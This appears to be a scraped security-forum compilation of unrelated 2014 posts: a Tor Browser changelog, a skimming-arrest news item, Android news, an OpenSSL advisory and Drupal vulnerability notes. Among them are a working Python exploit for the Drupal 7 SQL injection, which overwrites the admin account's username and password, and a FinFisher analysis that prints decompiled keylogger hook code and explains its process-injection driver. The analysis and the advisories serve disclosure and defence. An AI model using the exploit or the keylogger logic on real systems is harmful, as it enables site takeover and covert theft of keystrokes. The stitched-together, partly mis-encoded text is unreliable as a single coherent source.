Adapt Torbutton to ESR31's Australis UI. Bug 13138: ESR31-about:tor shows "Tor is not working" Bug 12947: Adapt session storage blocker to ESR 31. Bug 10716: Take care of drag/drop events in ESR 31. Bug 13366: Fix cert exemption dialog when disk storage is enabled. [*]Update Tor Launcher to 0.2.7.0.1 (from 0.2.5.6) Bug 11405: Remove firewall prompt from wizard. Bug 12895: Mention @Riseup.net as a valid bridge request email address Bug 12444: Provide feedback when “Copy Tor Log” is clicked. Bug 11199: Improve error messages if Tor exits unexpectedly Bug 12451: Add option to hide TBB's logo Bug 11193: Change "Tor Browser Bundle" to "Tor Browser" Bug 11471: Ensure text fits the initial configuration dialog Bug 9516: Send Tor Launcher log messages to Browser Console [*]Bug 13027: Spoof window.navigator useragent values in JS WebWorker threads [*]Bug 13016: Hide CSS -moz-osx-font-smoothing values. [*]Bug 13356: Meek and other symlinks missing after complete update. [*]Bug 13025: Spoof screen orientation to landscape-primary. [*]Bug 13346: Disable Firefox "slow to start" warnings and recordkeeping. [*]Bug 13318: Minimize number of buttons on the browser toolbar. [*]Bug 10715: Enable WebGL on Windows (still click-to-play via NoScript) [*]Bug 13023: Disable the gamepad API. [*]Bug 13021: Prompt before allowing Canvas isPointIn*() calls. [*]Bug 12460: Several cross-compilation and gitian fixes (see child tickets) [*]Bug 13186: Disable DOM Performance timers [*]Bug 13028: Defense-in-depth checks for OCSP/Cert validation proxy usage [*]Bug 4234: Automatic Update support (off by default) [*]Bug 11641: Reorganize bundle directory structure to mimic Firefox [*]Bug 10819: Create a preference to enable/disable third party isolation [*]Bug 13416: Defend against new SSLv3 attack (poodle). [*]Windows: Bug 10065: Enable DEP, ASLR, and SSP hardening options [*]Linux: Bug 13031: Add full RELRO hardening protection. Bug 10178: Make it easier to set an alternate Tor control port and password Bug 11102: Set Window Class to "Tor Browser" to aid in Desktop navigation Bug 12249: Don't create PT debug files anymore The list of frequently encountered known issues is also available in our bug tracker. Sursa: https://blog.torproject.org/blog/tor-browser-40-released?linkId=10066746

Nu ai ACK-uri pentru pachetele trimise. Nu stiu de ce zice tipul ca nu e important sa ajunga toate pachetele, dar daca nu ajungeau toate pachetele cand posta pe blog si articolul aparea jumatate probabil nu mai era asa fericit. Nu ai conexiune si ca sa vezi: primeste date de la cineva, un fisier important sa zicem. Si deodata crapa conexiunea persoanei respective. Stii asta? Nu. Tocmai ai primit jumatate de fisier. Traim in era GigaBit, cativa bytes in headerele pachetelor nu cred ca au un impact la fel de mare ca pierderea unor date importante.

Whoa, arata bine.

[h=1]Grupare specializat? în skimming, destructurat? de poli?i?tii bucure?teni[/h]SPECIAL • 16 Octombrie 2014 - 16:21 • B365.ro Cinci b?rba?i sunt b?nui?i c? ar fi confec?ionat ?i vândut dispozitive artizanale destinate clon?rii cardurilor. De la locuin?ele lor au fost ridicate mai multe medii de stocare a datelor, laptop-uri, hard disk-uri, telefoane mobile, carduri bancare ?i de fidelitate. Grupare specializat? în skimming, destructurat? de poli?i?tii bucure?teni Poli?i?tii Brig?zii de Combatere a Criminalit??ii Organizate Bucure?ti ?i procurorii D.I.I.C.O.T. – S.T. Bucure?ti au destructurat o grupare infrac?ional? specializat? în confec?ionarea de dispozitive artizanale destinate clon?rii cardurilor bancare ?i instalarea acestora la ATM-uri. Pentru probarea activit??ii infrac?ionale a celor cinci membri ai grup?rii, la data de 14 octombrie 2014, au fost efectuate 10 perchezi?ii la diferite imobile folosite de ace?tia. În urma acestor activit??i au fost identificate ?i ridicate mai multe medii de stocare a datelor, laptop-uri, hard disk-uri, telefoane mobile, carduri bancare ?i de fidelitate. Cei în cauz? au fost condu?i la sediul DIICOT Bucure?ti pentru efectuarea de audieri ?i cercet?ri, fa?? de ace?tia fiind dispus? m?sura preventiv? a controlului judiciar. Investiga?iile în cauz? au început cu ?ase 6 luni în urm?, iar din anchet? au rezultat indicii c? membrii grup?rii ar fi de?inut instrumentele ?i tehnica necesar? confec?ion?rii dispozitivelor de skimming ?i c? ar fi confec?ionat astfel de dispozitive. De asemenea, dispozitivele în cauz? erau testate pe bancomate din Bucure?ti pentru a verifica dac? func?ioneaz? corect, precum ?i pentru a efectua probele pentru eventualii cump?r?tori. Fa?? de cele cinci persoane a fost început? urm?rirea penal? sub aspectul s?vâr?irii infrac?iunilor de ini?iere, constituire ?i aderare la un grup infrac?ional organizat, de?inerea de echipamente în vederea falsific?rii instrumentelor de plat? electronic? ?i opera?iuni ilegale cu dispozitive sau programe informatice. Sursa: Grupare specializat? în skimming, destructurat? de poli?i?tii bucure?teni | B365

[h=1]Drupal 7.x SQL Injection SA-CORE-2014-005[/h] #Drupal 7.x SQL Injection SA-CORE-2014-005 https://www.drupal.org/SA-CORE-2014-005 #Creditz to https://www.reddit.com/user/fyukyuk import urllib2,sys from drupalpass import DrupalHash # https://github.com/cvangysel/gitexd-drupalorg/blob/master/drupalorg/drupalpass.py host = sys.argv[1] user = sys.argv[2] password = sys.argv[3] if len(sys.argv) != 3: print "host username password" print "http://nope.io admin wowsecure" hash = DrupalHash("$S$CTo9G7Lx28rzCfpn4WB2hUlknDKv6QTqHaf82WLbhPT2K5TzKzML", password).get_hash() target = '%s/?q=node&destination=node' % host post_data = "name[0%20;update+users+set+name%3d\'" \ +user \ +"'+,+pass+%3d+'" \ +hash[:55] \ +"'+where+uid+%3d+\'1\';;#%20%20]=bob&name[0]=larry&pass=lol&form_build_id=&form_id=user_login_block&op=Log+in" content = urllib2.urlopen(url=target, data=post_data).read() if "mb_strlen() expects parameter 1" in content: print "Success!\nLogin now with user:%s and pass:%s" % (user, password) Exploit: [Python] Drupal 7.x SQL Injection SA-CORE-2014-005 - Pastebin.com

Nexus 9 will be the first device powered by Lollipop By Cosmin Vasile on October 15th, 2014 18:21 GMT As expected, Google announced its new version of Android, along with Nexus 9 tablet, Nexus 6 smartphone and Nexus Player set-up box. With more than 5,000 new APIs for developers, Android 5.0 Lollipop is Google's most ambitious release since the mobile platform made its debut back in 2008. The most popular mobile operating system to date, Android is now focusing on flexibility and personalization options. Even though it's considered by many the most customizable mobile platform, Android 5.0 Lollipop focuses on convergence. Once again, Google is trying to bring on the market a product that could be used on multiple devices of different category, such as phones, tablets and TVs. Lollipop has been especially designed to offer users the possibility to pick up where they left off, “so the songs, photos, apps, and even recent searches from one of your Android devices can be immediately enjoyed across all the other ones.” The focus of Android 5.0 is on smoother transition from one screen to another, so users can experience the same feel on either devices mentioned earlier. In this regard, Google has created a consistent design across all compatible devices, which is called Material Design. This will allow for smoother transitions between tasks and more intuitive ways to interact with your devices. More control over devices is another improvement Google has added into Lollipop, which allows users to adjust their settings so that only certain people and notifications get through. Moreover, you will be able to see an important notification directly on the lockscreen.[h=3]Surprisingly, Nexus 4 qualifies for an Android 5.0 Lollipop update[/h]Android 5.0 Lollipop brings lots of new features and improvements, including a new battery saver that should extend battery life by up to 90 minutes. Google also added a guest user mode and enabled multiple user accounts, so personal data will remain private between users. Several security features have been included as well, such as the option to secure a device with a PIN, password, pattern, or even by pairing it to a trusted device like a watch or car with Smart Lock. The good news is Google confirmed Android 5.0 Lollipop will be available on Nexus 4 and Nexus 5 smartphones, as well as Nexus 7 and Nexus 10 tablets. All Google Play edition devices will receive the new version of the OS as an update “in the coming weeks.” The only devices that have been confirmed to ship with Android 5.0 Lollipop out of the box are Nexus 6, Nexus 9 and Nexus Player. Sursa si video: Android 5.0 Is Lollipop, Brings Material Design to Phones, Tablets and TVs - Softpedia

Posted on: 14 October 2014 By: siteadm As requested on reddit and twitter, this time I'm going to analyze final pieces of FinFisher malware: shell extension, driverw.sys and mssounddx.sys. No time to waste, so let's begin: a) Shell Extension (KeyLogger) As title says, shell extension's main/whole purpose is logging user's keystrokes. As Finfisher malware, never ceased to amaze me, this shell extension amazed me too. This DLL file, basically sets up global hook using SetWindowsHookEx API, records keystrokes of user, as a typical simple keylogger, but with a small difference. This keylogger doesn't hook WH_KEYBOARD or WH_KEYBOARD_LL, it hooks WH_GETMESSAGE, so basic keylogger detection methods won't be able to call it a "keylogger", even static analysis wouldn't show it as a keylogger, because it's hooking windows messages. Anyway, I'll do my best to decompile and write a psuedo code of the DLL file. Before starting, I should mention that DLL compilation date/time is: 10/28/2010 11:57:36 AM which I think is correct and unaltered. Anyway, here is the details of the DLL: Calls CreateEventW API with "Local\\{FFFFFFFF-FFFF-FFFF-FFFF-FFFFFFFFFFA0}" as event. Calls LoadString (unicode) two times to load two strings from resources and then it uses them as filename for saving logged keys and window titles. Filenames are: "\\\\.\\mailslot\\{FFFFFFFF-FFFF-FFFF-FFFF-FFFFFFFFFFE0}" (FILE1) and "\\\\.\\mailslot\\{FFFFFFFF-FFFF-FFFF-FFFF-FFFFFFFFFFE1}" (FILE2) ? Opens both these files at beginning and stores handles globally, so whole DLL will be able to call WriteFile using same handle. Sets up ImmGetCompositionStringA and ImmGetCompositionStringW hooks, these two are exported from imm32.dll. Calls SetWindowsHookExW to setup a global hook using WH_GETMESSAGE as hook type. In the hook handler (callback) function, checks callback type to WM_KEYDOWN and uses WriteFile API to write keystroke details to FILE1. So psuedo code should be something like this: void SetupHook() { HANDLE eventHandle = CreateEventW(0, 0, 0, L"Local\\{FFFFFFFF-FFFF-FFFF-FFFF-FFFFFFFFFFA0}"); if (eventHandle) { if ( GetLastError() == 183 ) CloseHandle(eventHandle); else { if ( HookHandle ) { UnhookWindowsHookEx(HookHandle); HookHandle = NULL; glbVar1 = 0; } } } if ( !LoadStringW(hmod, 0x101, &File1, 260) || !LoadStringW(hmod, 0x102, &File2, 260) ) return 0; glbHandleFile1 = CreateFileW(&File1, GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, 0, 0x03, 0, 0); if ( glbHandleFile1 == (HANDLE)-1 ) { lstErr = GetLastError(); errmsg = FormatMessageCall(lstErr); LocalFree((HLOCAL)errmsg); } glbHandleFile2 = CreateFileW(&File2, GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, 0, 0x03, 0, 0); if ( glbHandleFile1 == (HANDLE)-1 ) { lstErr = GetLastError(); errmsg = FormatMessageCall(lstErr); LocalFree((HLOCAL)errmsg); } imm32Handle = LoadLibraryA("imm32.dll"); if ( imm32Handle ) { fGetCompositionW = GetProcAddress(imm32Handle, "ImmGetCompositionStringW"); ret = HookSetup(fGetCompositionW, (int)GetCompositionWHook, (int)&RealGetCompositionW); fGetCompositionA = GetProcAddress(imm32Handle, "ImmGetCompositionStringA"); ret = HookSetup(fGetCompositionA, (int)GetCompositionAHook, (int)&RealGetCompositionA); } glbHHook = SetWindowsHookExW(WH_GETMESSAGE, (HOOKPROC)HookCallback, hmod, 0); } LRESULT CALLBACK HookCallback(int code,WPARAM wParam,LPARAM lParam) { LPMSG lpMsg = (LPMSG) lParam; if (!code && wParam == 1 && lpMsg->message == WM_KEYDOWN) { memset(&Dst, 0, 0x434); GetKeyboardLayoutNameA(&pwszKLID); HWND TheHWND = lpMsg->hwnd; HWND pHWND = TheHWND; curProcID = GetCurrentProcessId(); GetWindowThreadProcessId(TheHWND, &dwProcessId); hWnd = v6; while ( curProcID == dwProcessId ) { pHWND = TheHWND; pHWND = GetParent(pHWND); if ( !pHWND ) break; GetWindowThreadProcessId(pHWND, &dwProcessId); } memset(&wndTitle, 0, 0x208); GetWindowTextW(pHWND, &wndTitle, 259) WriteFile(File1, &Dst, 0x434u, &NumberOfBytesWritten, (LPOVERLAPPED)v7); return CallNextHookEx(hHook, code, wParam, lParam); } So, using Microsoft's sample code, I wrote a code to listen for both Slots, here is the code: #include <windows.h> #include <tchar.h> #include <stdio.h> #include <strsafe.h> HANDLE TheSlot1; HANDLE TheSlot2; LPTSTR SlotName = TEXT("\\\\.\\mailslot\\{FFFFFFFF-FFFF-FFFF-FFFF-FFFFFFFFFFE0}"); LPTSTR SlotName2 = TEXT("\\\\.\\mailslot\\{FFFFFFFF-FFFF-FFFF-FFFF-FFFFFFFFFFE1}"); BOOL ReadSlot(HANDLE hSlot) { DWORD cbMessage, cMessage, cbRead; BOOL fResult; LPTSTR lpszBuffer; TCHAR achID[80]; DWORD cAllMessages; HANDLE hEvent; OVERLAPPED ov; cbMessage = cMessage = cbRead = 0; hEvent = CreateEvent(NULL, FALSE, FALSE, TEXT("ExampleSlot")); if( NULL == hEvent ) return FALSE; ov.Offset = 0; ov.OffsetHigh = 0; ov.hEvent = hEvent; fResult = GetMailslotInfo( hSlot, // mailslot handle (LPDWORD) NULL, // no maximum message size &cbMessage, // size of next message &cMessage, // number of messages (LPDWORD) NULL); // no read time-out if (!fResult) { printf("GetMailslotInfo failed with %d.\n", GetLastError()); return FALSE; } if (cbMessage == MAILSLOT_NO_MESSAGE) return TRUE; cAllMessages = cMessage; while (cMessage != 0) // retrieve all messages { // Create a message-number string. StringCchPrintf((LPTSTR) achID, 80, TEXT("\nMessage #%d of %d\n"), cAllMessages - cMessage + 1, cAllMessages); // Allocate memory for the message. lpszBuffer = (LPTSTR) GlobalAlloc(GPTR, lstrlen((LPTSTR) achID)*sizeof(TCHAR) + cbMessage); if( NULL == lpszBuffer ) return FALSE; lpszBuffer[0] = '\0'; fResult = ReadFile(hSlot, lpszBuffer, cbMessage, &cbRead, &ov); if (!fResult) { printf("ReadFile failed with %d.\n", GetLastError()); GlobalFree((HGLOBAL) lpszBuffer); return FALSE; } // Concatenate the message and the message-number string. StringCbCat(lpszBuffer, lstrlen((LPTSTR) achID)*sizeof(TCHAR)+cbMessage, (LPTSTR) achID); // Display the message. _tprintf(TEXT("Contents of the mailslot: %s\n"), lpszBuffer); GlobalFree((HGLOBAL) lpszBuffer); fResult = GetMailslotInfo(hSlot, // mailslot handle (LPDWORD) NULL, // no maximum message size &cbMessage, // size of next message &cMessage, // number of messages (LPDWORD) NULL); // no read time-out if (!fResult) { printf("GetMailslotInfo failed (%d)\n", GetLastError()); return FALSE; } } CloseHandle(hEvent); return TRUE; } BOOL WINAPI MakeSlot(LPTSTR lpszSlotName) { TheSlot1 = CreateMailslot(lpszSlotName, 0, // no maximum message size MAILSLOT_WAIT_FOREVER, // no time-out for operations (LPSECURITY_ATTRIBUTES) NULL); // default security if (TheSlot1 == INVALID_HANDLE_VALUE) { printf("CreateMailslot failed with %d\n", GetLastError()); return FALSE; } return TRUE; } BOOL WINAPI MakeSlot2(LPTSTR lpszSlotName) { TheSlot2 = CreateMailslot(lpszSlotName, 0, // no maximum message size MAILSLOT_WAIT_FOREVER, // no time-out for operations (LPSECURITY_ATTRIBUTES) NULL); // default security if (TheSlot2 == INVALID_HANDLE_VALUE) { printf("CreateMailslot failed with %d\n", GetLastError()); return FALSE; } return TRUE; } void main() { MakeSlot(SlotName); MakeSlot2(SlotName2); while(TRUE) { ReadSlot(TheSlot1); ReadSlot(TheSlot2); Sleep(1000); } } Here is result while Finfisher keylogger was running: Driverw.sys I'll keep this one short as actual work of this driver is almost nothing. During MBR infection, user-mode code tries to access \\.\PhysicalDrive0, if it was able open physical drive successfully, it won't bother with driverw at all. If user-mode code wasn't able to access physical drive, it will load driverw.sys, call it from user mode to first open the physical drive, then it calls driver several times again to read and write to physical drive. So I think maybe they called it driverw, because it's a helper driver for Writing MBR code. As you can see it defines two functions only, one function which I renamed to FuncDiskAccess (actual main function, which access disk etc.) and UnloadDriver. Then driver calls ObReferenceObjectByHandle to get device object pointer. Consequently it calls IoGetAttachedDeviceReference to get DeviceObject itself. Now having device object, it can directly call IRPs of this object driver. So it will have direct access to whole PhysicalDrive0 without any check or access control. As last step it uses not documented or "not-well-documented" IofCallDriver function to read/write to disk. c) mssounddx.sys We actually talked about this driver in previous post during MBR analysis. But here I'll analyze it a little deeper. This driver is basically process injector, it waits for winlogon.exe and explorer.exe to run, then it allocates memory in them, decrypts malware payload using same XOR algorithm and finally calls NtCreateThread function. Here is breakdown: Driver entry: As you can see it simply call a function which I renamed to InitAndCreateThread. This function checks for registry mssounddx entry, if it exists, it creates a system thread: As you can see in the picture above, thread function is StartRoutine. This is what StartRoutine looks like: This is driver's start routine. As you can see first, it reads SSDT (KeServiceDescriptorTable), then it calls a function which I renamed to LocateNtCreateThread. This function basically locates NtCreateThread in SSDT. See: Using these xor and sub instructions, it allocates and pushes 2 strings into stack, ntdll.dll and NtCreateThread. After pushing strings into stack, it calls ResolveAPI which allocates a pool with 0x11223344 tag, then calls ZwQuerySystemInformation with SystemProcessInformation (0x0B) class. Then first it loops through modules to find ntdll.dll, afterwards, it loops through ntdll.dll functions to locate NtCreateThread function. In the end, it calls ExFreePoolTag to unallocate 0x11223344 pool. Back to StartRoutine, you'll see there is a call to a function which I renamed to InjectToProcess. This function is the whole purpose of driver. This function, waits for winlogon.exe and explorer.exe to run, until then, it keeps calling KeDelayExecutionThread (2 second delay). See: Then there is unnecessary code here, actually I don't think it's possible to have explorer.exe running without winlogon.exe already running. but I think programmers just copy/pasted the code for loop for winlogon.exe, which is unnecessary. See: When it finds WinLogon.exe, it opens the process using ZwOpenProcess, then it allocates memory several times in it: Next it finds offset of DLL to inject and decrypts it using same XOR algorithm: XOR algorithm which is same in all Finfisher malware modules: In the end, it calls dynamically found NtCreateThread, frees the allocated memory pages used in kernel, call PsTerminateSystemThread to terminate it's own thread. That's it. I hope you enjoyed whole Finfisher malware analysis articles. Feel free to comment or send an email about your questions. Also I want to thank everyone who helped to spread the word by retweeting, I really appreciate it. Sursa: https://www.codeandsec.net/FinFisher-Shell-Extension-and-Drivers-Analysis

OpenSSL Security Advisory [15 Oct 2014] ======================================= SRTP Memory Leak (CVE-2014-3513) ================================ Severity: High A flaw in the DTLS SRTP extension parsing code allows an attacker, who sends a carefully crafted handshake message, to cause OpenSSL to fail to free up to 64k of memory causing a memory leak. This could be exploited in a Denial Of Service attack. This issue affects OpenSSL 1.0.1 server implementations for both SSL/TLS and DTLS regardless of whether SRTP is used or configured. Implementations of OpenSSL that have been compiled with OPENSSL_NO_SRTP defined are not affected. OpenSSL 1.0.1 users should upgrade to 1.0.1j. This issue was reported to OpenSSL on 26th September 2014, based on an original issue and patch developed by the LibreSSL project. Further analysis of the issue was performed by the OpenSSL team. The fix was developed by the OpenSSL team. Session Ticket Memory Leak (CVE-2014-3567) ========================================== Severity: Medium When an OpenSSL SSL/TLS/DTLS server receives a session ticket the integrity of that ticket is first verified. In the event of a session ticket integrity check failing, OpenSSL will fail to free memory causing a memory leak. By sending a large number of invalid session tickets an attacker could exploit this issue in a Denial Of Service attack. OpenSSL 1.0.1 users should upgrade to 1.0.1j. OpenSSL 1.0.0 users should upgrade to 1.0.0o. OpenSSL 0.9.8 users should upgrade to 0.9.8zc. This issue was reported to OpenSSL on 8th October 2014. The fix was developed by Stephen Henson of the OpenSSL core team. SSL 3.0 Fallback protection =========================== Severity: Medium OpenSSL has added support for TLS_FALLBACK_SCSV to allow applications to block the ability for a MITM attacker to force a protocol downgrade. Some client applications (such as browsers) will reconnect using a downgraded protocol to work around interoperability bugs in older servers. This could be exploited by an active man-in-the-middle to downgrade connections to SSL 3.0 even if both sides of the connection support higher protocols. SSL 3.0 contains a number of weaknesses including POODLE (CVE-2014-3566). OpenSSL 1.0.1 users should upgrade to 1.0.1j. OpenSSL 1.0.0 users should upgrade to 1.0.0o. OpenSSL 0.9.8 users should upgrade to 0.9.8zc. https://tools.ietf.org/html/draft-ietf-tls-downgrade-scsv-00 https://www.openssl.org/~bodo/ssl-poodle.pdf Support for TLS_FALLBACK_SCSV was developed by Adam Langley and Bodo Moeller. Build option no-ssl3 is incomplete (CVE-2014-3568) ================================================== Severity: Low When OpenSSL is configured with "no-ssl3" as a build option, servers could accept and complete a SSL 3.0 handshake, and clients could be configured to send them. OpenSSL 1.0.1 users should upgrade to 1.0.1j. OpenSSL 1.0.0 users should upgrade to 1.0.0o. OpenSSL 0.9.8 users should upgrade to 0.9.8zc. This issue was reported to OpenSSL by Akamai Technologies on 14th October 2014. The fix was developed by Akamai and the OpenSSL team. References ========== URL for this Security Advisory: https://www.openssl.org/news/secadv_20141015.txt Note: the online version of the advisory may be updated with additional details over time. For details of OpenSSL severity classifications please see: https://www.openssl.org/about/secpolicy.html Sursa: https://www.openssl.org/news/secadv_20141015.txt

Drupal 7.31 pre Auth SQL Injection Vulnerability Posted: 2014-10-15 10:20 by Stefan Horst | Auf Deutsch lesen | More posts about Blog PHP Vulnerabilities Introduction Drupal is an open source content management platform powering millions of websites and applications. It’s built, used, and supported by an active and diverse community of people around the world. Drupal 7 is used by a vast number of sites and all of them are vulnerable. During a sourcecode audit for a customer we found an SQL Injection Vulnerability in Drupal's core handling of SQL queries, which we disclosed to the vendor. With this bug an attacker can gain full control over all Drupal sites (Admin privileges), without knowledge of internals or authentication on the site. He can even execute PHP Code without leaving a trace in any log. The Bug was introduced in early 2011 and stayed well hidden in the core framework. In this post we will discuss the SQL Injection on a higher level. If you want all technical details please refer to the Advisory we released We will wait until enough sites had time to update before we release a PoC, since this is a severe bug, which allows an attacker to execute arbitrary code with only one HTTP request and no knowledge of the site whatsoever. The Vulnerability All database queries in Drupal are handled via prepared statements. Placeholders are used in the SQL queries to indicate where user input should be included: SELECT * FROM {users} WHERE name IN (:name_0, :name_1) This prepared statement is called with a binding to variables for :name_0 and :name_1. This way an attacker cannot alter the SQL query, since he cannot inject values into the prepared statement. The number of placeholders has to be correct. Therefore Drupal uses a function to expand :name to :name_0, :name_1. This function handles the arrays incorrectly and expands the array to :name_$key0, :name_$key1. If the attacker can control the $key0 and $key1 he can manipulate the SQL query to look like this: SELECT * FROM {users} WHERE name IN (:name_test) OR name = 'Admin' -- , :name_test) which results in an SQL injection, where the attacker has full control over the database. He can dump all data, delete the whole database or create new users for example. If the user can control the database, he can insert values to gain remote code execution on the web server by using Drupal features with callbacks. Stefan Horst Sursa: https://www.sektioneins.de/en/blog/14-10-15-drupal-sql-injection-vulnerability.html